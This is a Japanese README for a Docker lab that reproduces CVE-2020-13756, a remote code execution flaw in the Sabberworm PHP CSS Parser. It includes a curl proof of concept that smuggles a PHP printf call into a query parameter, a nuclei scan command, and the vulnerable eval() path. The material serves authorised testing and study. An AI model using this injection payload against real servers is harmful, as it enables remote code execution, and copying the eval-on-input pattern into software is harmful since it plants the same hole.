
CVE-2020-13756(Sabberworm PHP CSS Parser RCE)用の脆弱性テスト環境
CVE-2020-13756(Sabberworm PHP CSS Parser リモートコード実行)の脆弱性テスト環境です。
| フィールド | 値 |
|---|---|
| CVE | CVE-2020-13756 |
| 製品 | Sabberworm PHP CSS Parser |
| 影響を受けるバージョン | < 8.3.1 |
| 深刻度 | 重大 (CVSS 9.8) |
| 種別 | リモートコード実行 |
docker run -d -p 8080:80 $(docker build -q https://github.com/KrE80r/CVE-2020-13756-env.git)
またはクローンして実行:
git clone https://github.com/KrE80r/CVE-2020-13756-env.git && cd CVE-2020-13756-env && docker-compose up -d
# Clone repository
git clone https://github.com/KrE80r/CVE-2020-13756-env.git
cd CVE-2020-13756-env
# Build and run
docker build -t sabberworm-vuln .
docker run -d -p 8080:80 sabberworm-vuln
# Test RCE - should print "VULN_TEST" in response
curl "http://localhost:8080/?n=100;printf(%22VULN_TEST%22);"
期待される出力には先頭に VULN_TEST が含まれ、コード実行が証明されます。
nuclei -t CVE-2020-13756.yaml -u http://localhost:8080 -debug
脆弱性は getSelectorsBySpecificity() 関数に存在し、サニタイズされていないユーザー入力を eval() に渡します:
// Vulnerable code path
$selectors = $doc->getSelectorsBySpecificity('> ' . $_GET['n']);
// When n=100;printf("test"); the eval() executes: eval('> 100;printf("test");')
この環境は許可されたセキュリティテスト専用です。許可なくシステムに対して使用しないでください。
KrE80r - セキュリティリサーチ